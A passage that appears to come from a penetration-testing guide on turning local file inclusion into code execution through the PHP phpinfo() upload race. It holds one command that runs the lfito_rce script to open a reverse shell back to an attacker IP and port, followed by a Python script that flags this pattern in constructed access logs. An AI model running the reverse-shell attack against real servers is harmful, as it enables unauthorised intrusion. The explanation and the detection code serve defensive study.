The prerequisites for this method are:

  • having file_uploads=on set in the PHP configuration file

  • having access to the output of the phpinfo() function

When file_uploads=on is set in the PHP configuration file, it is possible to upload a file by POSTing it to any PHP file (RFC 1867). The file is written to a temporary location on the server and deleted once the HTTP request has been fully processed.

The aim of the attack is to POST a PHP reverse shell to the server and delay the processing of the request by adding very long headers to it. This gives enough time to find the temporary location of the reverse shell in the output of the phpinfo() function and to include it via the LFI before it is removed.

The lfito_rce (Python2) script implements this attack.

# There is no requirements.txt, the dependencies have to be installed manually
python lfito_rce.py -l "http://$URL/?page=" --lhost=$attackerIP --lport=$attackerPORT -i "http://$URL/phpinfo.php"

The "LFI with phpinfo() assistance" research paper from Insomnia Security details this attack.
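From the defender's side, the two halves of this race both show up in the web server's access log: POSTs to the phpinfo() page, and requests whose parameter points at a PHP upload temp file. The script below is an added example (not part of lfito_rce or the Insomnia paper) that correlates them per client. It assumes the "combined" log format, a phpinfo endpoint whose path contains "phpinfo", and Linux temp names of the form phpXXXXXX; the log lines are constructed.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, parse_qsl

# Constructed sample lines in Apache/nginx "combined" format (not real traffic).
SAMPLE_LOG = """\
203.0.113.7 - - [10/Oct/2023:13:55:36 +0000] "POST /phpinfo.php HTTP/1.1" 200 84211 "-" "python-requests"
203.0.113.7 - - [10/Oct/2023:13:55:36 +0000] "GET /?page=/tmp/phpQ3xZ9a HTTP/1.1" 200 512 "-" "python-requests"
198.51.100.4 - - [10/Oct/2023:13:56:02 +0000] "GET /?page=about HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
198.51.100.9 - - [10/Oct/2023:13:57:10 +0000] "GET /phpinfo.php HTTP/1.1" 200 84100 "-" "Mozilla/5.0"
"""

# client, method, request target and status from one combined-format line
LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3}) ')
# Assumption: Linux default upload temp name (mkstemp "phpXXXXXX"), any directory.
TMP_UPLOAD_RE = re.compile(r'(?:^|/)php[A-Za-z0-9]{6}$')
PHPINFO_HINT = "phpinfo"  # assumption: the endpoint path contains "phpinfo"


def analyse(log_text):
    """Return {client_ip: set(findings)} for the two halves of the race."""
    findings = defaultdict(set)
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # not a combined-format line, skip it
        ip, method, target, _status = m.groups()
        url = urlsplit(target)
        # Half 1: a POST to the phpinfo page (a normal visit is a GET).
        if method == "POST" and PHPINFO_HINT in url.path.lower():
            findings[ip].add("post_to_phpinfo")
        # Half 2: any query parameter (percent-decoded) naming an upload temp file.
        for _name, value in parse_qsl(url.query, keep_blank_values=True):
            if TMP_UPLOAD_RE.search(value):
                findings[ip].add("include_of_upload_tmp")
    return dict(findings)


def high_confidence(findings):
    """Clients that showed both behaviours, i.e. the full pattern."""
    both = {"post_to_phpinfo", "include_of_upload_tmp"}
    return sorted(ip for ip, seen in findings.items() if both <= seen)


if __name__ == "__main__":
    result = analyse(SAMPLE_LOG)
    for ip, seen in sorted(result.items()):
        print(ip, sorted(seen))
    print("high confidence:", high_confidence(result))
```

Either finding alone is worth a look; removing the exposed phpinfo() page takes away the second prerequisite listed above.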
